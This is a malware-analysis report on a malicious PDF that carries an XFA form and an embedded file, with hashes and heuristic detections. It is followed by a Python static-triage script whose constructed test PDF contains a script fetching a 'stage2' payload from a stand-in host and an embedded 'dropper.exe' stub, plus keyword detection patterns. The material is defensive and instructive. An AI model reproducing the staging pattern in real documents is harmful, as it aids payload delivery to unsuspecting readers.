Malicious PDF — malware analysis report

Static analysis result for SHA-256 f32b8b7855ccfbb1…

Verdict: MALICIOUS
Type: PDF
Size: 6.4 KB
MD5: e967f834f89ae46a2c34073d50d3e8fc
SHA-1: 1913c78971792af27ae05003f88e8d8618769e6d
SHA-256: f32b8b7855ccfbb182afac31ac645f843fcfca949a745115d0d8e5de77c3e185
Risk score: 106

Malware Insights

MITRE ATT&CK
T1204 User Execution, T1204.002 User Execution: Malicious File

The file is a PDF document that ClamAV identifies as Pdf.Exploit.Agent-6136306-0, a signature family for exploit-bearing PDFs, and the ML classifier flags it as malicious with high confidence. The document body is obfuscated and could not be interpreted statically, but the file carries an XFA form (which can hold script logic) and an embedded file attachment, the two features most often used to stage a nested payload from a PDF. The two extracted URLs are the standard XDP and XFA-template namespace URIs that an XFA packet declares; they are schema identifiers, not network indicators. The likely attack pattern is a PDF reader exploit that runs an embedded payload. The static triage does not identify the specific vulnerability, so detonation in an instrumented reader is needed to confirm the exploit and recover the payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9974

Heuristics (4)

  • ClamAV: Pdf.Exploit.Agent-6136306-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-6136306-0
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xdp/
    • http://www.xfa.org/schema/xfa-template/2.5/
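The heuristics above (PDF_XFA, PDF_EMBEDDED, EMBEDDED_URL) can be reproduced with a small static triage pass. The example below is added here and is not the scanner's own code; it constructs its own minimal PDF sample (the file name dropper.exe, the stage2 URL and the obfuscated /#58FA name are invented for the demonstration). It shows the three things a practitioner wants from such a pass: inflating FlateDecode streams so keywords hidden inside them are seen, undoing #xx hex escapes in PDF names so an obfuscated /XFA still matches, and labelling XFA namespace URIs separately from URLs that appear inside script so they are not mistaken for indicators.

```python
import re
import zlib

# Constructed sample XFA packet: declares the two namespace URIs seen in the
# report and carries a script that reaches out to an invented stage-2 URL.
XFA_XML = (b'<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">'
           b'<template xmlns="http://www.xfa.org/schema/xfa-template/2.5/">'
           b'<script contentType="application/x-javascript">'
           b'app.launchURL("http://example.invalid/stage2");</script>'
           b'</template></xdp:xdp>')


def build_sample_pdf() -> bytes:
    """Constructed test document (not the analysed sample): XFA form in a
    FlateDecode stream, an embedded file, and /XFA written as /#58FA."""
    xfa = zlib.compress(XFA_XML)
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /AcroForm << /#58FA 3 0 R >> "
        b"/Names << /EmbeddedFiles << /Names [(dropper.exe) 4 0 R] >> >> >>",
        b"<< /Type /Pages /Kids [] /Count 0 >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(xfa)
        + xfa + b"\nendstream",
        b"<< /Type /Filespec /F (dropper.exe) /EF << /F 5 0 R >> >>",
        b"<< /Type /EmbeddedFile /Length 4 >>\nstream\nMZ\x90\x00\nendstream",
    ]
    out = b"%PDF-1.7\n"
    for i, body in enumerate(objs, 1):
        out += b"%d 0 obj\n" % i + body + b"\nendobj\n"
    return out + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.S)
NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
URL_RE = re.compile(rb"https?://[^\s\"'<>()]+")
SCRIPT_RE = re.compile(rb"<script\b[^>]*>(.*?)</script>", re.S | re.I)
XFA_NAMESPACES = (b"http://ns.adobe.com/xdp/", b"http://www.xfa.org/schema/")

# Keyword -> heuristic tag. Names must end at a delimiter so /JS does not
# match /JSomething; /EmbeddedFiles (name tree) and /EmbeddedFile both count.
MARKERS = [
    (rb"/XFA(?![A-Za-z0-9])", "PDF_XFA"),
    (rb"/EmbeddedFiles?(?![A-Za-z0-9])", "PDF_EMBEDDED"),
    (rb"/JavaScript(?![A-Za-z0-9])", "PDF_JS"),
    (rb"/JS(?![A-Za-z0-9])", "PDF_JS"),
    (rb"/OpenAction(?![A-Za-z0-9])", "PDF_OPENACTION"),
    (rb"/AA(?![A-Za-z0-9])", "PDF_AUTOACTION"),
    (rb"/Launch(?![A-Za-z0-9])", "PDF_LAUNCH"),
    (rb"<script\b", "XFA_SCRIPT"),
]


def inflate_streams(data: bytes) -> bytes:
    """Replace each FlateDecode stream body with its inflated content so
    keywords and URLs hidden in compressed objects are visible. Streams
    that do not inflate (other filters, or deliberately damaged) stay as-is."""
    def repl(m):
        try:
            return b"stream\n" + zlib.decompress(m.group(1)) + b"\nendstream"
        except zlib.error:
            return m.group(0)
    return STREAM_RE.sub(repl, data)


def normalise_names(data: bytes) -> bytes:
    """Undo #xx hex escapes in PDF names (/#58FA -> /XFA), a common trick
    to hide keywords from naive string scanners."""
    return NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def _urls(blob: bytes) -> set:
    return {u.rstrip(b".,;") for u in URL_RE.findall(blob)}


def triage_pdf(data: bytes) -> dict:
    """Return the heuristic tags that fire and every extracted URL with the
    channel it came from: xfa-namespace (schema URI, not an indicator),
    xfa-script (inside a <script> element), or body."""
    text = normalise_names(inflate_streams(data))
    hits = sorted({tag for pat, tag in MARKERS if re.search(pat, text)})
    script_urls = set()
    for body in SCRIPT_RE.findall(text):
        script_urls |= _urls(body)
    urls = {}
    for u in _urls(text):
        if u.startswith(XFA_NAMESPACES):
            label = "xfa-namespace"
        elif u in script_urls:
            label = "xfa-script"
        else:
            label = "body"
        urls[u.decode("ascii", "replace")] = label
    return {"heuristics": hits, "urls": urls}


if __name__ == "__main__":
    result = triage_pdf(build_sample_pdf())
    for tag in result["heuristics"]:
        print("heuristic:", tag)
    for url, channel in sorted(result["urls"].items()):
        print(f"url [{channel}]: {url}")
```

On the constructed sample the pass reports PDF_EMBEDDED, PDF_XFA and XFA_SCRIPT even though the literal bytes /XFA never appear in the file, and it separates the two namespace URIs from the script-reached URL, which is the one that would go on a blocklist.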